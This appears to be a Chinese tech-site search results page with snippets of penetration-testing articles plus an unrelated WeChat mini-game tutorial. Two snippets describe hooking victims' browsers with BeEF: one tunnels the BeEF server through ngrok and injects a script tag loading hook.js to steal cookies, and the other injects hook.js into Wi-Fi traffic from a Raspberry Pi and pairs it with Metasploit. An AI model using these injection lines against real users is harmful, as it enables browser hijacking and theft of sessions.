首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

基于Beef-XSS+Sunny-Ngrok进行内网安全测试

0x00 实验工具 kali linux v2.0 beef-xss sunny-ngrok: http://www.ngrok.cc 0x01 开通tcp代理,并下载客户端进行内网穿透 都是老司机注册这里就不说了...注意这里远程端口号要和本地端口号保持一致,正常情况下可以不用这么填,但是hook.js在发送请求的时候会在后面自动追加端口号,造成无法成功请求,所以我就干脆设置成一样的了。...接下来就是下载客户端,进行连接了。在这个地址(http://www.ngrok.cc/download.html)下载相应的客户端版本。 具体命令是: ./sunny clientid 隧道id ?...接下来我们只要把hook.js脚本想办法加载到目标网站就可以实现对浏览器的攻击了,最起码get个cookie还是不成问题的。...实现基于beef的xss攻击 一般来说我们要加载一个js文件只需加入下边一行代码就可以: <script type="text/javascript" src="http://yoururl.com/<em>hook.js</em>

1.1K50

微信小游戏入门实战《小猫钓鱼》

CocosCreator 2.2.0 下载地址: http://cocos2d-x.org/filedown/CocosCreator_v2.2.0_win 安装教程: 打开下载好的7z压缩包并解压...微信web开发者工具 下载地址: https://developers.weixin.qq.com/miniprogram/dev/devtools/download.html 安装教程:运行安装文件...资源下载: 链接: https://pan.baidu.com/s/1rpqBRE9hSBw7TnC3eEQT9w 提取码: 2s7y 设计尺寸 首先,这是一个竖屏游戏,而 Creator 默认创建的是横板游戏...3.在assets中创建脚本Hook.js,并将脚本作为组建添加到节点Hook上 ?...添加的方法为,点击节点Hook,在属性检查器中,添加组件添加用户脚本组件Hook.js 4.在Hook.js脚本中添加如下代码,来让鱼钩动起来: start () { this.node.runAction

1.6K40
您找到你想要的搜索结果了吗?
是的
没有找到

JS投毒的另一种尝试

这里我选择了BeEF框架进行配合,在流量中插入hook.js 5、既然BeEF可以配合MSF来攻击浏览器,那这里自然也少不了MSF的戏份 0×02 工具准备 EDUP 迷你USB无线网卡 免驱动 (RTL8188CUS...0×03 改造树莓派 首先让树莓派运行起来,玩过的人都知道怎么弄,下载镜像,写入镜像,不做赘述。...修改asset/inject/extern.js,在function中增加: var commandModuleStr = '<script src="http://172.16.6.37:3000/<em>hook.js</em>...貌似用BeEF控制用户的浏览器去<em>下载</em>一个后门文件,也是可以的。 0×08小结 1、都是前人的东西,只不过组合了一下而已,没有任何穿创新,比较水。...2、<em>hook.js</em>对手机浏览器没有任何效果 3、MSF的漏洞库比较并没有想象中那么强大,想要一举拿下被投毒的电脑,没有几个0day估计是搞不定的 4、忽然对360清空浏览器缓存的功能感到很纠结…… 5、

2.3K101
领券